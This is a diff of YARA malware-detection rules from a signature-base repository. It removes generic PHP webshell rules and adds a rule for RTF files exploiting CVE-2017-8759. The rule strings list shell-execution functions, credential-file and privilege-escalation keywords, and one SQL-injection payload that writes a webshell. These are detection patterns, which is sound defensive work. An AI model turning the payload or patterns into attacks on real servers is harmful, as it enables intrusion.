-		hash = "bee1b76b1455105d4bfe2f45191071cf05e83a309ae9defcf759248ca9bceddd"
-		hash = "6bf351900a408120bee3fc6ea39905c6a35fe6efcf35d0a783ee92062e63a854"
-		hash = "e3b4e5ec29628791f836e15500f6fdea19beaf3e8d9981c50714656c50d3b365"
-		hash = "00813155bf7f5eb441e1619616a5f6b21ae31afc99caa000c4aafd54b46c3597"
-		hash = "e31788042d9cdeffcb279533b5a7359b3beb1144f39bacdd3acdef6e9b4aff25"
-		hash = "36b91575a08cf40d4782e5aebcec2894144f1e236a102edda2416bc75cbac8dd"
-		hash = "a34154af7c0d7157285cfa498734cfb77662edadb1a10892eb7f7e2fb5e2486c"
-		hash = "791a882af2cea0aa8b8379791b401bebc235296858266ddb7f881c8923b7ea61"
-		hash = "9a8ab3c225076a26309230d7eac7681f85b271d2db22bf5a190adbf66faca2e6"
-		hash = "0d3ee83adc9ebf8fb1a8c449eed5547ee5e67e9a416cce25592e80963198ae23"
-		hash = "3d8708609562a27634df5094713154d8ca784dbe89738e63951e12184ff07ad6"
-		hash = "70d64d987f0d9ab46514abcc868505d95dbf458387f858b0d7580e4ee8573786"
-		hash = "259b3828694b4d256764d7d01b0f0f36ca0526d5ee75e134c6a754d2ab0d1caa"
-		hash = "04d139b48d59fa2ef24fb9347b74fa317cb05bd8b7389aeb0a4d458c49ea7540"
-		hash = "58d0e2ff61301fe0c176b51430850239d3278c7caf56310d202e0cdbdde9ac3f"
-		hash = "731f36a08b0e63c63b3a2a457667dfc34aa7ff3a2aee24e60a8d16b83ad44ce2"
-		hash = "e4ffd4ec67762fe00bb8bd9fbff78cffefdb96c16fe7551b5505d319a90fa18f"
-		hash = "fa00ee25bfb3908808a7c6e8b2423c681d7c52de2deb30cbaea2ee09a635b7d4"
-		hash = "98c1937b9606b1e8e0eebcb116a784c9d2d3db0039b21c45cba399e86c92c2fa"
-		hash = "e9423ad8e51895db0e8422750c61ef4897b3be4292b36dba67d42de99e714bff"
-		hash = "7a16311a371f03b29d5220484e7ecbe841cfaead4e73c17aa6a9c23b5d94544d"
-		hash = "7ca5dec0515dd6f401cb5a52c313f41f5437fc43eb62ea4bcc415a14212d09e9"
-		hash = "3de8c04bfdb24185a07f198464fcdd56bb643e1d08199a26acee51435ff0a99f"
-		hash = "63297f8c1d4e88415bc094bc5546124c9ed8d57aca3a09e36ae18f5f054ad172"
-		hash = "a09dcf52da767815f29f66cb7b03f3d8c102da5cf7b69567928961c389eac11f"
-		hash = "d9ae762b011216e520ebe4b7abcac615c61318a8195601526cfa11bbc719a8f1"
-		hash = "dd5d8a9b4bb406e0b8f868165a1714fe54ffb18e621582210f96f6e5ae850b33"
-		logic_hash = "03c1963ec7a0409970baa98dc3a62f721c092b41d4026475a38b1ef466426b75"
-		score = 70
-		quality = -184
-		tags = "FILE"
+		logic_hash = "184179006ed2ac2ad76e09c53196805fcb1b7380dab1d5740b4469a89d6b0b32"
+		score = 75
+		quality = 60
+		tags = "CVE-2017-8759, FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "840ad14e29144be06722aff4cc04b377364eeed0a82b49cc30712823838e2444"
 
 	strings:
-		$wfp_tiny1 = "escapeshellarg" fullword
-		$wfp_tiny2 = "addslashes" fullword
-		$gfp_tiny3 = "include \"./common.php\";"
-		$gfp_tiny4 = "assert('FALSE');"
-		$gfp_tiny5 = "assert(false);"
-		$gfp_tiny6 = "assert(FALSE);"
-		$gfp_tiny7 = "assert('array_key_exists("
-		$gfp_tiny8 = "echo shell_exec($aspellcommand . ' 2>&1');"
-		$gfp_tiny9 = "throw new Exception('Could not find authentication source with id ' . $sourceId);"
-		$gfp_tiny10 = "return isset( $_POST[ $key ] ) ? $_POST[ $key ] : ( isset( $_REQUEST[ $key ] ) ? $_REQUEST[ $key ] : $default );"
-		$gfp_tiny11 = "; This is the recommended, PHP 4-style version of the php.ini-dist file"
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$inp1 = "php://input" wide ascii
-		$inp2 = /_GET\s?\[/ wide ascii
-		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
-		$inp4 = /_POST\s?\[/ wide ascii
-		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
-		$inp6 = /_REQUEST\s?\[/ wide ascii
-		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
-		$inp8 = /\(\s?\$_HEADERS\s?[\)\[]/ wide ascii
-		$inp15 = "_SERVER['HTTP_" wide ascii
-		$inp16 = "_SERVER[\"HTTP_" wide ascii
-		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
-		$inp18 = "array_values($_SERVER)" wide ascii
-		$inp19 = /file_get_contents\("https?:\/\// wide ascii
-		$inp20 = "TSOP_" wide ascii
-		$cpayload1 = /\beval[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload2 = /\bexec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload3 = /\bshell_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload4 = /\bpassthru[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.{0,500}|e'" nocase wide ascii
-		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$gen_bit_sus6 = "self.delete"
-		$gen_bit_sus9 = "\"cmd /c" nocase
-		$gen_bit_sus10 = "\"cmd\"" nocase
-		$gen_bit_sus11 = "\"cmd.exe" nocase
-		$gen_bit_sus12 = "%comspec%" wide ascii
-		$gen_bit_sus13 = "%COMSPEC%" wide ascii
-		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
-		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$gen_bit_sus21 = "\"upload\"" wide ascii
-		$gen_bit_sus22 = "\"Upload\"" wide ascii
-		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
-		$gen_bit_sus24 = "fileupload" wide ascii
-		$gen_bit_sus25 = "file_upload" wide ascii
-		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$gen_bit_sus30 = "serv-u" wide ascii
-		$gen_bit_sus31 = "Serv-u" wide ascii
-		$gen_bit_sus32 = "Army" fullword wide ascii
-		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
-		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
-		$gen_bit_sus35 = "crack" fullword wide ascii
-		$gen_bit_sus44 = "<pre>" wide ascii
-		$gen_bit_sus45 = "<PRE>" wide ascii
-		$gen_bit_sus46 = "shell_" wide ascii
-		$gen_bit_sus50 = "bypass" wide ascii
-		$gen_bit_sus52 = " ^ $" wide ascii
-		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
-		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
-		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
-		$gen_bit_sus57 = "dumper" wide ascii
-		$gen_bit_sus59 = "'cmd'" wide ascii
-		$gen_bit_sus60 = "\"execute\"" wide ascii
-		$gen_bit_sus61 = "/bin/sh" wide ascii
-		$gen_bit_sus62 = "Cyber" wide ascii
-		$gen_bit_sus63 = "portscan" fullword wide ascii
-		$gen_bit_sus66 = "whoami" fullword wide ascii
-		$gen_bit_sus67 = "$password='" fullword wide ascii
-		$gen_bit_sus68 = "$password=\"" fullword wide ascii
-		$gen_bit_sus69 = "$cmd" fullword wide ascii
-		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
-		$gen_bit_sus71 = "Hacking" fullword wide ascii
-		$gen_bit_sus72 = "hacking" fullword wide ascii
-		$gen_bit_sus73 = ".htpasswd" wide ascii
-		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
-		$gen_bit_sus75 = "uploaded" fullword wide ascii
-		$gen_much_sus7 = "Web Shell" nocase
-		$gen_much_sus8 = "WebShell" nocase
-		$gen_much_sus3 = "hidded shell"
-		$gen_much_sus4 = "WScript.Shell.1" nocase
-		$gen_much_sus5 = "AspExec"
-		$gen_much_sus14 = "\\pcAnywhere\\" nocase
-		$gen_much_sus15 = "antivirus" nocase
-		$gen_much_sus16 = "McAfee" nocase
-		$gen_much_sus17 = "nishang"
-		$gen_much_sus18 = "\"unsafe" fullword wide ascii
-		$gen_much_sus19 = "'unsafe" fullword wide ascii
-		$gen_much_sus24 = "exploit" fullword wide ascii
-		$gen_much_sus25 = "Exploit" fullword wide ascii
-		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
-		$gen_much_sus30 = "Hacker" wide ascii
-		$gen_much_sus31 = "HACKED" fullword wide ascii
-		$gen_much_sus32 = "hacked" fullword wide ascii
-		$gen_much_sus33 = "hacker" wide ascii
-		$gen_much_sus34 = "grayhat" nocase wide ascii
-		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
-		$gen_much_sus36 = "Rootkit" wide ascii
-		$gen_much_sus37 = "rootkit" wide ascii
-		$gen_much_sus38 = "/*-/*-*/" wide ascii
-		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$gen_much_sus40 = "\"e\"+\"v" wide ascii
-		$gen_much_sus41 = "a\"+\"l\"" wide ascii
-		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$gen_much_sus43 = "q\"+\"u\"" wide ascii
-		$gen_much_sus44 = "\"u\"+\"e" wide ascii
-		$gen_much_sus45 = "/*//*/" wide ascii
-		$gen_much_sus46 = "(\"/*/\"" wide ascii
-		$gen_much_sus47 = "eval(eval(" wide ascii
-		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
-		$gen_much_sus49 = "Shell.Users" wide ascii
-		$gen_much_sus50 = "PasswordType=Regular" wide ascii
-		$gen_much_sus51 = "-Expire=0" wide ascii
-		$gen_much_sus60 = "_=$$_" wide ascii
-		$gen_much_sus61 = "_=$$_" wide ascii
-		$gen_much_sus62 = "++;$" wide ascii
-		$gen_much_sus63 = "++; $" wide ascii
-		$gen_much_sus64 = "_.=$_" wide ascii
-		$gen_much_sus70 = "-perm -04000" wide ascii
-		$gen_much_sus71 = "-perm -02000" wide ascii
-		$gen_much_sus72 = "grep -li password" wide ascii
-		$gen_much_sus73 = "-name config.inc.php" wide ascii
-		$gen_much_sus75 = "password crack" wide ascii
-		$gen_much_sus76 = "mysqlDll.dll" wide ascii
-		$gen_much_sus77 = "net user" wide ascii
-		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
-		$gen_much_sus81 = /strrev\(['"]/ wide ascii
-		$gen_much_sus82 = "PHPShell" fullword wide ascii
-		$gen_much_sus821 = "PHP Shell" fullword wide ascii
-		$gen_much_sus83 = "phpshell" fullword wide ascii
-		$gen_much_sus84 = "PHPshell" fullword wide ascii
-		$gen_much_sus87 = "deface" wide ascii
-		$gen_much_sus88 = "Deface" wide ascii
-		$gen_much_sus89 = "backdoor" wide ascii
-		$gen_much_sus90 = "r00t" fullword wide ascii
-		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
-		$gen_much_sus92 = "str_rot13" fullword wide ascii
-		$gif = { 47 49 46 38 }
-		$cmpayload1 = /\beval[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload2 = /\bexec[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload3 = /\bshell_exec[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload4 = /\bpassthru[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload5 = /\bsystem[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload6 = /\bpopen[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload7 = /\bproc_open[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload8 = /\bpcntl_exec[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload9 = /\bassert[\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cmpayload10 = /\bpreg_replace[\t ]{0,500}\([^\)]{1,100}\/e/ nocase wide ascii
-		$cmpayload11 = /\bpreg_filter[\t ]{0,500}\([^\)]{1,100}\/e/ nocase wide ascii
-		$cmpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cmpayload20 = /\bcreate_function[\t ]{0,500}\([^)]/ nocase wide ascii
-		$cmpayload21 = /\bReflectionFunction[\t ]{0,500}\([^)]/ nocase wide ascii
-		$fp1 = "# Some examples from obfuscated malware:" ascii
-		$fp2 = "{@see TFileUpload} for further details." ascii
+		$s1 = /<soap:address location="http[s]?:\/\/[^"]{8,140}.hta"/ ascii wide
+		$s2 = /<soap:address location="http[s]?:\/\/[^"]{8,140}mshta.exe"/ ascii wide
 
 	condition:
-		not ( any of ( $gfp_tiny* ) or 1 of ( $fp* ) ) and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $inp* ) ) and ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) and ( ( filesize < 1000 and not any of ( $wfp_tiny* ) ) or ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) and ( filesize > 5KB or not any of ( $wfp_tiny* ) ) ) or ( filesize < 500KB and ( 4 of ( $cmpayload* ) ) ) )
+		( filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Generic_Callback : FILE
+rule SIGNATURE_BASE_CVE_2017_8759_WSDL_In_RTF : CVE_2017_8759 FILE
 {
 	meta:
-		description = "php webshell having some kind of input and using a callback to execute the payload. restricted to small files or would give lots of false positives"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e33dba84-bbeb-5955-a81b-2d2c8637fb48"
-		date = "2021-01-14"
-		modified = "2023-09-18"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_webshells.yar#L413-L718"
+		description = "Detects malicious RTF file related CVE-2017-8759"
+		author = "Security Doggo @xdxdxdxdoa"
+		id = "daaa5489-af96-5a69-b2dd-81406c0a1edc"
+		date = "2017-09-15"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/xdxdxdxdoa/status/908665278199996416"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2017_8759.yar#L94-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "e98889690101b59260e871c49263314526f2093f"
-		hash = "63297f8c1d4e88415bc094bc5546124c9ed8d57aca3a09e36ae18f5f054ad172"
-		hash = "81388c8cc99353cdb42572bb88df7d3bd70eefc748c2fa4224b6074aa8d7e6a2"
-		hash = "27d3bfabc283d851b0785199da8b1b0384afcb996fa9217687274dd56a7b5f49"
-		hash = "ee256d7cc3ceb2bf3a1934d553cdd36e3fbde62a02b20a1b748a74e85d4dbd33"
-		hash = "4adc6c5373c4db7b8ed1e7e6df10a3b2ce5e128818bb4162d502056677c6f54a"
-		hash = "1fe4c60ea3f32819a98b1725581ac912d0f90d497e63ad81ccf258aeec59fee3"
-		hash = "2967f38c26b131f00276bcc21227e54ee6a71881da1d27ec5157d83c4c9d4f51"
-		hash = "1ba02fb573a06d5274e30b2b05573305294497769414e964a097acb5c352fb92"
-		hash = "f4fe8e3b2c39090ca971a8e61194fdb83d76fadbbace4c5eb15e333df61ce2a4"
-		hash = "badda1053e169fea055f5edceae962e500842ad15a5d31968a0a89cf28d89e91"
-		hash = "0a29cf1716e67a7932e604c5d3df4b7f372561200c007f00131eef36f9a4a6a2"
-		hash = "51c2c8b94c4b8cce806735bcf6e5aa3f168f0f7addce47b699b9a4e31dc71b47"
-		hash = "de1ef827bcd3100a259f29730cb06f7878220a7c02cee0ebfc9090753d2237a8"
-		hash = "487e8c08e85774dfd1f5e744050c08eb7d01c6877f7d03d7963187748339e8c4"
-		logic_hash = "e12dec5252a816c10443fe0e0b40b0b9b4a187b32facd8e09e1f057801da25f9"
-		score = 60
-		quality = -128
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		logic_hash = "47adc7adfc55239792aef818648546adb1627e74690de0d811100cc49aab8c2f"
+		score = 75
+		quality = 85
+		tags = "CVE-2017-8759, FILE"
 
 	strings:
-		$gfp1 = "eval(\"return [$serialised_parameter"
-		$gfp2 = "$this->assert(strpos($styles, $"
-		$gfp3 = "$module = new $_GET['module']($_GET['scope']);"
-		$gfp4 = "$plugin->$_POST['action']($_POST['id']);"
-		$gfp5 = "$_POST[partition_by]($_POST["
-		$gfp6 = "$object = new $_REQUEST['type']($_REQUEST['id']);"
-		$gfp7 = "The above example code can be easily exploited by passing in a string such as"
-		$gfp8 = "Smarty_Internal_Debug::start_render($_template);"
-		$gfp9 = "?p4yl04d=UNION%20SELECT%20'<?%20system($_GET['command']);%20?>',2,3%20INTO%20OUTFILE%20'/var/www/w3bsh3ll.php"
-		$gfp10 = "[][}{;|]\\|\\\\[+=]\\|<?=>?"
-		$gfp11 = "(eval (getenv \"EPROLOG\")))"
-		$gfp12 = "ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly9saWNlbnNlLm9wZW5jYXJ0LWFwaS5jb20vbGljZW5zZS5waHA/b3JkZXJ"
-		$gfp_tiny3 = "include \"./common.php\";"
-		$gfp_tiny4 = "assert('FALSE');"
-		$gfp_tiny5 = "assert(false);"
-		$gfp_tiny6 = "assert(FALSE);"
-		$gfp_tiny7 = "assert('array_key_exists("
-		$gfp_tiny8 = "echo shell_exec($aspellcommand . ' 2>&1');"
-		$gfp_tiny9 = "throw new Exception('Could not find authentication source with id ' . $sourceId);"
-		$gfp_tiny10 = "return isset( $_POST[ $key ] ) ? $_POST[ $key ] : ( isset( $_REQUEST[ $key ] ) ? $_REQUEST[ $key ] : $default );"
-		$inp1 = "php://input" wide ascii
-		$inp2 = /_GET\s?\[/ wide ascii
-		$inp3 = /\(\s?\$_GET\s?\)/ wide ascii
-		$inp4 = /_POST\s?\[/ wide ascii
-		$inp5 = /\(\s?\$_POST\s?\)/ wide ascii
-		$inp6 = /_REQUEST\s?\[/ wide ascii
-		$inp7 = /\(\s?\$_REQUEST\s?\)/ wide ascii
-		$inp15 = "_SERVER['HTTP_" wide ascii
-		$inp16 = "_SERVER[\"HTTP_" wide ascii
-		$inp17 = /getenv[\t ]{0,20}\([\t ]{0,20}['"]HTTP_/ wide ascii
-		$inp18 = "array_values($_SERVER)" wide ascii
-		$inp19 = /file_get_contents\("https?:\/\// wide ascii
-		$callback1 = /\bob_start[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback2 = /\barray_diff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback3 = /\barray_diff_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback4 = /\barray_filter[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback5 = /\barray_intersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback6 = /\barray_intersect_ukey[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback7 = /\barray_map[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback8 = /\barray_reduce[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback9 = /\barray_udiff_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback10 = /\barray_udiff_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback11 = /\barray_udiff[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback12 = /\barray_uintersect_assoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback13 = /\barray_uintersect_uassoc[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback14 = /\barray_uintersect[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback15 = /\barray_walk_recursive[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback16 = /\barray_walk[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback17 = /\bassert_options[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback18 = /\buasort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback19 = /\buksort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback20 = /\busort[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback21 = /\bpreg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback22 = /\bspl_autoload_register[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback23 = /\biterator_apply[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback24 = /\bcall_user_func[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback25 = /\bcall_user_func_array[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback26 = /\bregister_shutdown_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback27 = /\bregister_tick_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback28 = /\bset_error_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback29 = /\bset_exception_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback30 = /\bsession_set_save_handler[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback31 = /\bsqlite_create_aggregate[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback32 = /\bsqlite_create_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$callback33 = /\bmb_ereg_replace_callback[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$m_callback1 = /\bfilter_var[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$m_callback2 = "FILTER_CALLBACK" fullword wide ascii
-		$cfp1 = /ob_start\(['\"]ob_gzhandler/ nocase wide ascii
-		$cfp2 = "IWPML_Backend_Action_Loader" ascii wide
-		$cfp3 = "<?phpclass WPML" ascii
-		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$gen_bit_sus6 = "self.delete"
-		$gen_bit_sus9 = "\"cmd /c" nocase
-		$gen_bit_sus10 = "\"cmd\"" nocase
-		$gen_bit_sus11 = "\"cmd.exe" nocase
-		$gen_bit_sus12 = "%comspec%" wide ascii
-		$gen_bit_sus13 = "%COMSPEC%" wide ascii
-		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
-		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$gen_bit_sus21 = "\"upload\"" wide ascii
-		$gen_bit_sus22 = "\"Upload\"" wide ascii
-		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
-		$gen_bit_sus24 = "fileupload" wide ascii
-		$gen_bit_sus25 = "file_upload" wide ascii
-		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$gen_bit_sus30 = "serv-u" wide ascii
-		$gen_bit_sus31 = "Serv-u" wide ascii
-		$gen_bit_sus32 = "Army" fullword wide ascii
-		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
-		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
-		$gen_bit_sus35 = "crack" fullword wide ascii
-		$gen_bit_sus44 = "<pre>" wide ascii
-		$gen_bit_sus45 = "<PRE>" wide ascii
-		$gen_bit_sus46 = "shell_" wide ascii
-		$gen_bit_sus50 = "bypass" wide ascii
-		$gen_bit_sus52 = " ^ $" wide ascii
-		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
-		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
-		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
-		$gen_bit_sus57 = "dumper" wide ascii
-		$gen_bit_sus59 = "'cmd'" wide ascii
-		$gen_bit_sus60 = "\"execute\"" wide ascii
-		$gen_bit_sus61 = "/bin/sh" wide ascii
-		$gen_bit_sus62 = "Cyber" wide ascii
-		$gen_bit_sus63 = "portscan" fullword wide ascii
-		$gen_bit_sus66 = "whoami" fullword wide ascii
-		$gen_bit_sus67 = "$password='" fullword wide ascii
-		$gen_bit_sus68 = "$password=\"" fullword wide ascii
-		$gen_bit_sus69 = "$cmd" fullword wide ascii
-		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
-		$gen_bit_sus71 = "Hacking" fullword wide ascii
-		$gen_bit_sus72 = "hacking" fullword wide ascii
-		$gen_bit_sus73 = ".htpasswd" wide ascii
-		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
-		$gen_much_sus7 = "Web Shell" nocase
-		$gen_much_sus8 = "WebShell" nocase
-		$gen_much_sus3 = "hidded shell"
-		$gen_much_sus4 = "WScript.Shell.1" nocase
-		$gen_much_sus5 = "AspExec"
-		$gen_much_sus14 = "\\pcAnywhere\\" nocase
-		$gen_much_sus15 = "antivirus" nocase
-		$gen_much_sus16 = "McAfee" nocase
-		$gen_much_sus17 = "nishang"
-		$gen_much_sus18 = "\"unsafe" fullword wide ascii
-		$gen_much_sus19 = "'unsafe" fullword wide ascii
-		$gen_much_sus24 = "exploit" fullword wide ascii
-		$gen_much_sus25 = "Exploit" fullword wide ascii
-		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
-		$gen_much_sus30 = "Hacker" wide ascii
-		$gen_much_sus31 = "HACKED" fullword wide ascii
-		$gen_much_sus32 = "hacked" fullword wide ascii
-		$gen_much_sus33 = "hacker" wide ascii
-		$gen_much_sus34 = "grayhat" nocase wide ascii
-		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
-		$gen_much_sus36 = "Rootkit" wide ascii
-		$gen_much_sus37 = "rootkit" wide ascii
-		$gen_much_sus38 = "/*-/*-*/" wide ascii
-		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$gen_much_sus40 = "\"e\"+\"v" wide ascii
-		$gen_much_sus41 = "a\"+\"l\"" wide ascii
-		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$gen_much_sus43 = "q\"+\"u\"" wide ascii
-		$gen_much_sus44 = "\"u\"+\"e" wide ascii
-		$gen_much_sus45 = "/*//*/" wide ascii
-		$gen_much_sus46 = "(\"/*/\"" wide ascii
